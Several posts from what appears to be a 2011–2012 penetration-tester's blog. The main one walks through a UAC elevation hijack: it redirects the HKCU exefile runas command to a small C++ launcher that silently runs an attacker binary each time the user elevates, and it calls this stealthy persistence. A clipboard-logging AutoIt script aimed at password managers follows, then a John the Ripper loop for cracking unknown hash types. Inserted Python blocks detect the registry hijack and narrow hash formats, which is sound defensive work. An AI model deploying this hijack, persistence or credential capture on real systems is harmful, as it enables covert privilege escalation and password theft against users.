Tuesday, Jan 03, 2012

(UAC) User Assisted Compromise

A number of times during tests I've actually run into those mythical creatures called "patched Windows machines". At DerbyCon, Chris Gates and I released the "Ask" post module (which I had failed to publish). This module very simply uses the ShellExecute Windows function via Railgun with the undocumented (but very well known) operation 'runas'. These two lines accomplished that:

client.railgun.add_function( 'shell32', 'ShellExecuteA', 'DWORD',[["DWORD","hwnd","in"],["PCHAR","lpOperation","in"],["PCHAR","lpFile","in"],["PCHAR","lpParameters","in"],["PCHAR","lpDirectory","in"],["DWORD","nShowCmd","in"],])
client.railgun.shell32.ShellExecuteA(nil,"runas","evil.exe",nil,nil,5)

This would quite simply prompt the user with that annoying UAC prompt asking them to run 'evil.exe' with Administrative privs. If they are not "Admins" themselves, it would prompt them for a user name and password (normally the case on systems attached to domains). Something to be aware of: if your evil.exe is not code-signed, the UAC box will be orange instead of blue. You can get around this a bit by using rundll32.exe (which is signed ;-) ), as is svchost.exe. (You may also want to not name it evil.exe.)

The downfall here is twofold: 1. you have to drop a binary (boooo), and 2. you are prompting the user for UAC control when they didn't do anything to cause it. Users are generally as smart as bait, but it's good practice to assume the contrary, if for nothing else than to challenge yourself to up your game.

Number 1 I'll leave to another post, so let's solve #2.

When a "runas" ShellExecute happens (which is what UAC does natively #hint#hint), a few registry locations are checked. One I'd like to point out is the HKLM\Software\Classes\exefile key. The 'exefile' key, as should be obvious, holds the registry settings for executables, and as such tells Windows how to interact with them. In HKLM (which is only writable by Administrators) the "shell\open", "shell\runas" and "shell\runasuser" subkeys exist (the structure looks oddly familiar to anyone who has visited the ShellExecute page more than once). Inside "shell\open\command" the default string is "%1" %*, which basically means: execute the binary %1 and hand it the given arguments %* directly. Awesome! From here you can alter how every EXE runs on the system (don't do it, Windows doesn't like you afterwards, trust me, and if you do anyway, remember to snapshot first).

Great, but how does this help us? We aren't admins. HKCU is writable by the 'Current User' (hence the name), and it so happens to have a very similar registry path: HKCU\Software\Classes. Depending on your system, it may or may not have an "exefile" subkey. If it doesn't, it's pretty easy to create. Let's make it match the "runas" one in HKLM.

The tree should look something like this when you are done:

  • HKLM
    • Software
      • Classes
        • exefile
          • shell
            • runas
              • command

Under command, change the default value to "%1" %* just as it is in HKLM, and add a new String value called 'IsolatedCommand' with the same value as the default. With these settings, very little has changed on the system or its operation. However, if we change the 'IsolatedCommand' String to 'notepad.exe' and attempt to 'Run As Administrator' on that system using any binary, guess what happens? Notepad! (as Admin). w00t. Now we can swap in our evil.exe and Bob wins, right? Sorta. We still have that horrible problem of stealth. Whatever the user was trying to UAC up won't work, so they'll try it again and start investigating the problem, which we don't want them to do.

Enter 'runyou.exe', some very simple C++ that weighs in at a whopping 8k when compiled (it could probably lose some weight in the hands of those who know better compiler options):

// Build with UNICODE/_UNICODE defined so _TCHAR is wchar_t, which ShellExecuteW expects.
#ifndef UNICODE
#define UNICODE
#define _UNICODE
#endif
#include <windows.h>
#include <stdio.h>
#include <tchar.h>

int _tmain(int argc, _TCHAR* argv[])
{
    // argv[argc] is always NULL, so a missing argument simply skips the launch
    if (argv[1])
    {
        // first argument: launched with its window shown
        ShellExecuteW(NULL, NULL, argv[1], NULL, NULL, SW_SHOW);
        if (argv[2])
        {
            // second argument: launched with its window hidden
            ShellExecuteW(NULL, NULL, argv[2], NULL, NULL, SW_HIDE);
        }
    }
    return 0;
}

This code executes the first program visibly and then the second hidden. You probably see where this is going, but we change our IsolatedCommand String to runyou.exe %1 evil.exe and now we give them exactly what they want in an elevated state, but also get our evil binary there too ;-)

The very real downside to this is that you have to wait for the user to use UAC (it does not trigger when anyone else does; HKCU is only the current user's hive). But, as a side benefit, it's a very real form of sneaky persistence as well, since it will execute our evil binary every single time they use UAC.
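A defender-side check for the HKCU hijack described above, added here as an example and not part of the original post: it parses a reg export of HKCU\Software\Classes\exefile and reports any command string under the open, runas or runasuser verbs that differs from the stock "%1" %*. The minimal .reg parser, the function names and the sample export (constructed, not from a real host) are mine.

```python
import re

# Constructed sample of `reg export HKCU\Software\Classes\exefile` from a host where the
# IsolatedCommand value has been pointed at runyou.exe, as the post describes.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\exefile]

[HKEY_CURRENT_USER\Software\Classes\exefile\shell\runas\command]
@="\"%1\" %*"
"IsolatedCommand"="runyou.exe %1 evil.exe"
'''

EXEFILE = r'HKEY_CURRENT_USER\Software\Classes\exefile'
STOCK = '"%1" %*'                      # the value HKLM carries; anything else is a redirect
VERBS = ('open', 'runas', 'runasuser') # the three subkeys the post walks through


def parse_reg(text):
    """Minimal .reg parser: string values only, returned as {key: {name: value}}."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith('[') and line.endswith(']'):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.endswith('"'):
            name, sep, value = line.partition('=')
            if sep and value.startswith('"'):      # "name"="value" or @="value"
                name = '(Default)' if name == '@' else name.strip('"')
                keys[current][name] = re.sub(r'\\(.)', r'\1', value[1:-1])
    return keys


def find_exefile_hijack(reg_text):
    """List (verb, value name, value) for every HKCU exefile command string that is not
    the stock '"%1" %*'. HKCU normally has no exefile key at all, so any such value means
    an elevation request launches that command instead of the EXE the user chose."""
    keys = parse_reg(reg_text)
    findings = []
    for verb in VERBS:
        for name, value in keys.get(f'{EXEFILE}\\shell\\{verb}\\command', {}).items():
            if value != STOCK:
                findings.append((verb, name, value))
    return findings


if __name__ == '__main__':
    for verb, name, value in find_exefile_hijack(SAMPLE_REG):
        print(f'HKCU exefile\\shell\\{verb}\\command [{name}] = {value}')
```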

Game Over... ;-)

Monday, Dec 26, 2011

Hak5 Segment Sneak Peek

Since it's Christmas and all, I thought I'd post the code snippet from my Hak5 segment a bit early:

#include <Clipboard.au3>
#include <File.au3>
$oldclip = ""
While 1
    $clip = _ClipBoard_GetData()
    If $clip <> "0" Then
        If $clip <> $oldclip Then
            _FileWriteLog(@UserProfileDir & "\clip.log", $clip)
            $oldclip = $clip
        EndIf
    EndIf
    Sleep(100)
WEnd

It's pretty straightforward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although I'm sure most of you can figure it out just by reading it).

(Think KeePass, 1Password, LastPass...)

Thursday, Dec 22, 2011

Shared Links


When Google Reader decided to remove everything it was good for, we all scrambled to find new homes for the things we wanted to share. Tumblr became the place most of us flocked to. I've found Tumblr to be not a very good substitute for Google Reader's functionality (IMHO).

The other day, carnal0wnage told me about a service called 'Buffer'. All this thing does is scheduled tweets, but it has one distinct feature: not only is it focused around the sharing of links, it works (if you install the browser plugin/extension) INSIDE OF GOOGLE READER ;-) So you can be reading a feed item, push a button and not have to open a page or another app; it's pretty much all right there.

I know what you're thinking: cool, but no big deal, right? It goes to Twitter, and not to a feed that someone can subscribe to. You're right, and I fought all day trying to figure that part out and finally came up with a Twitter search for my tweets plus a special hashtag I would use for my shared links. I found the RSS feed for that search and it looks like this:

http://search.twitter.com/search.atom?q=from%3Amubix%20%23SharedLinks

Obviously, this isn't the easiest or prettiest link to send around, so instead I pumped that into Feedburner and now have this as a feed link:

http://feeds.feedburner.com/MubixLinks

Much easier to share, with one AMAZING added bonus: I can switch the feed that powers it at any time. So from now on, whether I use Tumblr, Google Reader (after they unjack themselves) or G+ (if they finally set up a feed for +1'd items), that will always be the link to the items I've personally liked and wanted to share.

I encourage you to do the same, and leave a comment, so that I can follow your feed back!

Oh, and sign up for Buffer here (w/ my referral link ;) http://bufferapp.com/r/7e450


Monday, Dec 12, 2011

Hash Types for John the Ripper

Pentest Monkey is a great resource for a lot of things. One of which is this:

John The Ripper Hash Formats | pentestmonkey

I used it, plus a bit of bash fu, to figure out the type of some hashes I was trying to crack.

Step 1: Create a file of supported hash types. For me that was simple: I just threw the following into 'supported_types.txt' in the same directory as john.

DES
BSDI
MD5
BF
AFS
LM
NT
XSHA
PO
raw-MD5
MD5-gen
IPB2
raw-sha1
md5a
hmac-md5
phpass-md5
KRB5
bfegg
nsldap
ssha
openssha
oracle
oracle11
MYSQL
mysql-sha1
mscash
lotus5
DOMINOSEC
NETLM
NETNTLM
NETLMv2
NETNTLMv2
NETHALFLM
mssql
mssql05
epi
phps
mysql-fast
pix-md5
sapG
sapB
md5ns
HDAA

Then it's as simple as issuing:

cat supported_types.txt | xargs -t -I type ./john --pot=unknownhash.pot --wordlist=shortlist.txt --format=type hashfile.txt

That will essentially try each of the types on the hash file. It's important to use a wordlist, and probably a small one initially, because if you don't, john will not finish once it gets to the first hash type that it accepts, which may not actually be the correct one.

You can take this a step further and create a hash mangler script that takes a clean hash and adds the few prefixes and suffixes that are common on Pentest Monkey's list, to give John the best odds of picking it up.
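A way to shorten the loop above, added here as an example and not the post's own tooling: it guesses which of the 43 formats in supported_types.txt fit a hash's shape from well-known prefixes and lengths (rules I added, not something the post states), and emits the same john invocation the xargs one-liner produces for each candidate. A hash that fits no rule falls back to the full list, exactly as the one-liner does.

```python
import re

# The 43 format names from supported_types.txt, in the order the post lists them.
ALL_FORMATS = ("DES BSDI MD5 BF AFS LM NT XSHA PO raw-MD5 MD5-gen IPB2 raw-sha1 md5a "
               "hmac-md5 phpass-md5 KRB5 bfegg nsldap ssha openssha oracle oracle11 "
               "MYSQL mysql-sha1 mscash lotus5 DOMINOSEC NETLM NETNTLM NETLMv2 "
               "NETNTLMv2 NETHALFLM mssql mssql05 epi phps mysql-fast pix-md5 sapG "
               "sapB md5ns HDAA").split()

# Shape rules added for this example: (regex over the bare hash, matching formats).
# Only formats whose on-disk encoding is unambiguous get a rule; the rest stay in the
# fallback. A 32-hex string can be LM, NT or raw MD5, so all three are returned.
RULES = [
    (r'^\$1\$[^$]{0,8}\$[./0-9A-Za-z]{22}$',  ['MD5']),              # md5crypt
    (r'^\$2[axy]\$\d\d\$[./0-9A-Za-z]{53}$',  ['BF']),               # bcrypt
    (r'^\$[PH]\$[./0-9A-Za-z]{31}$',          ['phpass-md5']),       # phpass
    (r'^[0-9a-fA-F]{32}$',                    ['LM', 'NT', 'raw-MD5']),
    (r'^[0-9a-fA-F]{40}$',                    ['raw-sha1']),
    (r'^\*[0-9A-F]{40}$',                     ['mysql-sha1']),       # MySQL 4.1+
    (r'^\{SHA\}[A-Za-z0-9+/=]{28}$',          ['nsldap']),           # base64 SHA-1
    (r'^\{SSHA\}[A-Za-z0-9+/=]+$',            ['ssha']),             # salted, base64
    (r'^0x0100[0-9a-fA-F]{88}$',              ['mssql']),            # MSSQL 2000
    (r'^0x0100[0-9a-fA-F]{48}$',              ['mssql05']),          # MSSQL 2005
    (r'^_[./0-9A-Za-z]{19}$',                 ['BSDI']),             # BSDI extended DES
    (r'^[./0-9A-Za-z]{13}$',                  ['DES']),              # traditional crypt
]


def candidate_formats(h):
    """Formats worth trying for one hash; the whole list if its shape is unknown."""
    h = h.strip()
    found = [f for pat, fmts in RULES if re.match(pat, h) for f in fmts]
    return found or list(ALL_FORMATS)


def john_commands(h, hashfile, wordlist='shortlist.txt', pot='unknownhash.pot'):
    """The per-format invocation from the post, limited to the candidate formats."""
    return [f'./john --pot={pot} --wordlist={wordlist} --format={fmt} {hashfile}'
            for fmt in candidate_formats(h)]


if __name__ == '__main__':
    # constructed sample value, not a real credential
    for cmd in john_commands('{SHA}' + 'A' * 27 + '=', 'hashfile.txt'):
        print(cmd)
```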
Thursday, Dec 01, 2011

First day of a No Starch Christmas - Winner

Our first day of No Starch winner is Russ with Room 362 right next to the Fire Hose ;-)

1st Day of @NoStarch Winner